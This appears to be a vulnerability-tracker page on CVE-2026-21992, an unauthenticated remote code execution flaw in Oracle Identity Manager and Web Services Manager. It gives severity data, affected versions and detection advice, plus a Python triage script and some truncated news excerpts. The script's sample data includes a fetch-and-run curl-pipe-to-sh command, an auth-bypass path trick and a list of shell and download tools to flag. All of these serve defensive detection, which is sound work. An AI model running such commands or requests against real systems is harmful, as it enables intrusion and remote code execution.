CVE-2026-21992
Published 2026-03-20
CVE-2026-21992: Unauthenticated remote code execution in Oracle Identity Manager (REST WebServices) and Oracle Web Services Manager (Web Services Security), Oracle Fusion Middleware
Priority: P2 · 66
Severity: Critical, CVSS 3.1 base score 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 1.01% (58.7th percentile)
Vulnerability in the Oracle Identity Manager product of Oracle Fusion Middleware (component: REST WebServices) and Oracle Web Services Manager product of Oracle Fusion Middleware (component: Web Services Security). Supported versions that are affected are 12.2.1.4.0 and 14.1.2.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Identity Manager and Oracle Web Services Manager. Successful attacks of this vulnerability can result in takeover of Oracle Identity Manager and Oracle Web Services Manager. Note: Oracle Web Services Manager is installed with an Oracle Fusion Middleware Infrastructure. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Affected
| Vendor | Product | Affected versions | Fixed in |
|---|---|---|---|
| Oracle | Identity Manager (Oracle Fusion Middleware, component: REST WebServices) | 12.2.1.4.0, 14.1.2.1.0 | Out-of-band Security Alert patch (see Oracle advisory) |
| Oracle | Web Services Manager (Oracle Fusion Middleware, component: Web Services Security) | 12.2.1.4.0, 14.1.2.1.0 | Out-of-band Security Alert patch (see Oracle advisory) |
Detection & IOCs (extracted from sources)
- CVE-2026-21992 is exploitable by an unauthenticated attacker over HTTP with no user interaction (AV:N/PR:N/UI:N), against the Oracle Identity Manager REST WebServices component and the Oracle Web Services Manager Web Services Security component. Monitor for anomalous unauthenticated HTTP requests to these components' endpoints, in particular requests that succeed without an authenticated session.
- Oracle shipped the fix as an out-of-band Security Alert rather than waiting for the next quarterly Critical Patch Update, which signals high urgency; treat unpatched Oracle Identity Manager and Oracle Web Services Manager 12.2.1.4.0 and 14.1.2.1.0 instances as exposed.
- Exploitation status is unconfirmed: Oracle declined to tell the press whether the flaw has been exploited. Until that changes, treat unexpected child processes (shells, download tools) or unexpected outbound connections from the WebLogic JVMs hosting Identity Manager or Web Services Manager as high-priority indicators.
- A related pre-authentication RCE in the same Oracle Identity Manager REST WebServices component, CVE-2025-61757, was confirmed exploited in the wild and added to CISA KEV in November 2025; expect similar targeting and post-exploitation behaviour once details of CVE-2026-21992 become public.
- Patches released through Oracle's Security Alert program are only available for versions under Premier or Extended Support; older, unsupported versions will not receive a fix and should be upgraded or isolated.
- Oracle Web Services Manager is installed as part of Oracle Fusion Middleware Infrastructure, so the patching scope is the full Fusion Middleware stack (every domain with the Infrastructure installed), not just standalone Identity Manager deployments.
- Affected versions are 12.2.1.4.0 and 14.1.2.1.0 for both Oracle Identity Manager and Oracle Web Services Manager; Oracle lists no other versions as affected.
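The two detection points above (anomalous unauthenticated HTTP requests to the REST endpoints, and unexpected process spawning from the Identity Manager / Web Services Manager JVMs) can be turned into concrete triage checks. The following is an added example written for this page; it is not Oracle's code and not a published detection for CVE-2026-21992. It assumes WebLogic's default common-log-format access.log, that OIM's REST services are deployed under /iam/governance/, and that the managed server hosting OIM is named oim_server1; the log lines and process records are constructed, and the path-parameter suffix heuristic is borrowed from public analysis of the related CVE-2025-61757, not from this advisory.

```python
"""Triage checks for hosts running Oracle Identity Manager (OIM) / Oracle Web
Services Manager (OWSM) on WebLogic. Added example; not Oracle's code.
Assumptions (not from the advisory): default common-log-format access.log,
OIM REST under /iam/governance/, OIM managed server named oim_server1."""
import re
from collections import Counter
from os.path import basename

# WebLogic default access.log line:
#   host - user [dd/Mon/yyyy:HH:MM:SS zone] "METHOD path HTTP/x" status bytes
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Context roots an anonymous client should never successfully reach (assumed).
REST_PREFIXES = ("/iam/governance/",)
# Path tricks that confuse URL-pattern auth filters: a ';' path parameter other
# than jsessionid, or a WSDL/WADL suffix. Heuristic taken from public analysis
# of the related CVE-2025-61757, not from this advisory.
PATH_TRICK_RE = re.compile(r";(?!jsessionid)|\?wsdl\b|\.wadl\b", re.IGNORECASE)
# Programs a WebLogic JVM serving web requests has no reason to spawn.
SHELLS_AND_TOOLS = {"sh", "bash", "dash", "ksh", "zsh", "curl", "wget",
                    "nc", "ncat", "python", "python3", "perl"}


def parse_access_line(line):
    """Parse one access.log line into a dict, or None if it does not match."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def flag_unauthenticated_rest(lines):
    """Flag anonymous (user '-') requests under REST_PREFIXES that either
    succeeded (2xx) or carried a path trick. Anonymous 401/403 responses are
    the expected outcome and are not flagged. Returns (hits, per_ip_counts)."""
    hits, per_ip = [], Counter()
    for line in lines:
        rec = parse_access_line(line)
        if rec is None or not rec["path"].startswith(REST_PREFIXES):
            continue
        trick = PATH_TRICK_RE.search(rec["path"]) is not None
        if rec["user"] == "-" and (trick or 200 <= rec["status"] < 300):
            rec["reason"] = "path_trick" if trick else "anon_2xx"
            hits.append(rec)
            per_ip[rec["ip"]] += 1
    return hits, per_ip


def weblogic_ancestor(event, by_pid, max_depth=5):
    """Walk up the parent chain looking for a WebLogic server JVM."""
    cur = event
    for _ in range(max_depth):
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            return None
        if "weblogic.Server" in cur["cmdline"]:
            return cur
    return None


def flag_suspicious_children(events):
    """Flag shells/download tools descended from a WebLogic JVM. Each event is a
    process-creation record {pid, ppid, exe, cmdline} (auditd/EDR style).
    Returns the flagged events tagged with the WebLogic server name."""
    by_pid = {e["pid"]: e for e in events}
    flagged = []
    for e in events:
        if basename(e["exe"]) not in SHELLS_AND_TOOLS:
            continue
        wls = weblogic_ancestor(e, by_pid)
        if wls is None:
            continue
        name = re.search(r"-Dweblogic\.Name=(\S+)", wls["cmdline"])
        flagged.append({**e, "server": name.group(1) if name else "unknown"})
    return flagged


# Constructed sample data (not from a real incident).
SAMPLE_ACCESS = [
    '10.0.0.5 - jdoe [20/Mar/2026:10:01:02 +0000] "GET /iam/governance/selfservice/api/v1/users HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Mar/2026:10:02:10 +0000] "GET /iam/governance/selfservice/api/v1/users HTTP/1.1" 401 0',
    '198.51.100.7 - - [20/Mar/2026:10:02:11 +0000] "GET /iam/governance/selfservice/api/v1/users;.wadl HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Mar/2026:10:02:12 +0000] "POST /iam/governance/selfservice/api/v1/users HTTP/1.1" 200 77',
    '10.0.0.9 - - [20/Mar/2026:10:03:00 +0000] "GET /identity/faces/signin HTTP/1.1" 200 9001',
]
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 1, "exe": "/u01/jdk/bin/java",
     "cmdline": "java -server -Dweblogic.Name=oim_server1 weblogic.Server"},
    {"pid": 4101, "ppid": 1, "exe": "/u01/jdk/bin/java",
     "cmdline": "java -server -Dweblogic.Name=AdminServer weblogic.Server"},
    {"pid": 5200, "ppid": 4100, "exe": "/bin/sh", "cmdline": "sh -c curl http://203.0.113.4/x.sh|sh"},
    {"pid": 5201, "ppid": 5200, "exe": "/usr/bin/curl", "cmdline": "curl http://203.0.113.4/x.sh"},
    {"pid": 5300, "ppid": 4101, "exe": "/u01/jdk/bin/java", "cmdline": "java -version"},
    {"pid": 6000, "ppid": 999, "exe": "/bin/bash", "cmdline": "bash"},
]

if __name__ == "__main__":
    hits, per_ip = flag_unauthenticated_rest(SAMPLE_ACCESS)
    for h in hits:
        print(f"[http] {h['reason']:<10} {h['ip']} {h['method']} {h['path']} {h['status']}")
    print("[http] per-source counts:", dict(per_ip))
    for f in flag_suspicious_children(SAMPLE_EVENTS):
        print(f"[proc] {f['server']} spawned pid {f['pid']}: {f['cmdline']}")
```

Two caveats when adapting this: the access.log user field only reflects container-level authentication (HTTP Basic or client certificate), so a deployment that authenticates via session cookies will log legitimate users as "-" and the anon_2xx heuristic must be tuned to the real context roots and auth scheme; and the process check only knows what its input knows, so feed it the parent chain (auditd ppid or EDR process-tree data) rather than a flat list of interesting processes.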
No detection rules found.
No public exploits indexed.
Bleepingcomputer · 2026-06-02 · CVE-2024-21182 (High, CVSS 7.5)
CISA flags two-year-old Oracle flaw as actively exploited in attacks
By Sergiu Gatlan
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has ordered government agencies to secure their systems against a high-severity Oracle WebLogic Server vulnerability that was patched two years ago and is now actively exploited in attacks.
Oracle WebLogic Server is an enterprise-grade Java app server used as middleware for large, multi-tier distributed applications.
Tracked as CVE-2024-21182, this security flaw can be exploited remotely by threat actors with no privileges in low-complexity attacks targeting systems running Oracle WebLogic Server versions 12.2.1.4.0 and 14.1.1.0.0.
"Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to
Talos · 2026-03-26
A puppet made me cry and all I got was this t-shirt
Welcome to this week’s edition of the Threat Source newsletter.
Anyone who spoke with me in the last several weeks has had to deal with me loudly waiting in anticipation for the long-awaited “Project Hail Mary” movie adaptation. I read (and cried over) the book by Andy Weir, who’s also the author of “The Martian,” about a year ago and, shortly after, found out it was being made into a movie.
(I know what you’re thinking: Two movie-themed editions in two weeks? It’s every cinephile’s dream!)
Anyway, the story centers around a biologist and science teacher named Ryland Grace (Ryan Gosling), who wakes up from a coma on a spaceship lightyears away from Earth, his two crewmembers long dead. Our planet’s sun is slowly dimming, its energy
Hackernews · 2026-03-23
⚡ Weekly Recap: CI/CD Backdoor, FBI Buys Location Data, WhatsApp Ditches Numbers & More
Another week, another reminder that the internet is still a mess. Systems people thought were secure are being broken in simple ways, showing many still ignore basic advisories.
This edition covers a mix of issues: supply chain attacks hitting CI/CD setups, long-abused IoT devices being shut down, and exploits moving quickly from disclosure to real attacks. There are also new malware tricks showing attackers are becoming more patient and creative.
It’s a mix of old problems that never go away and new methods that are harder to detect. Th
Hackernews · 2026-03-21 · CVE-2026-21992 (Critical, CVSS 9.8)
Oracle Patches Critical CVE-2026-21992 Enabling Unauthenticated RCE in Identity Manager
Oracle has released security updates to address a critical security flaw impacting Identity Manager and Web Services Manager that could be exploited to achieve remote code execution.
The vulnerability, tracked as CVE-2026-21992, carries a CVSS score of 9.8 out of a maximum of 10.0.
"This vulnerability is remotely exploitable without authentication," Oracle said in an advisory. "If successfully exploited, this vulnerability may result in remote code execution."
CVE-2026-21992 affects the following versions -
Oracle Identity Manager ver
Tenable · 2026-03-20 · CVE-2026-21992 (Critical, CVSS 9.8)
CVE-2026-21992: Critical Out-of-Band Oracle Identity Manager and Oracle Web Services Manager Remote Code Execution Vulnerability
Bleepingcomputer · 2026-03-20 · CVE-2026-21992 (Critical, CVSS 9.8)
Oracle pushes emergency fix for critical Identity Manager RCE flaw
By Lawrence Abrams
Update: Added that Oracle declined to comment on whether the vulnerability has been exploited.
Oracle has released an out-of-band security update to fix a critical unauthenticated remote code execution vulnerability in Identity Manager and Web Services Manager tracked as CVE-2026-21992.
Oracle Identity Manager is used for managing identities and access across an enterprise, while Oracle Web Services Manager provides security and management controls for web services.
In an advisory released yesterday, Oracle is "strongly" recommending that customers apply the patches as soon as possible.
"This Security Alert addresses vulnerability CVE-2026-21992 in Oracle Identity Manager and Oracle Web Services
Wiz · CVE-2026-21992 (Critical, CVSS 9.8)
CVE-2026-21992 Impact, Exploitability, and Mitigation Steps: Oracle Identity Manager vulnerability analysis and mitigation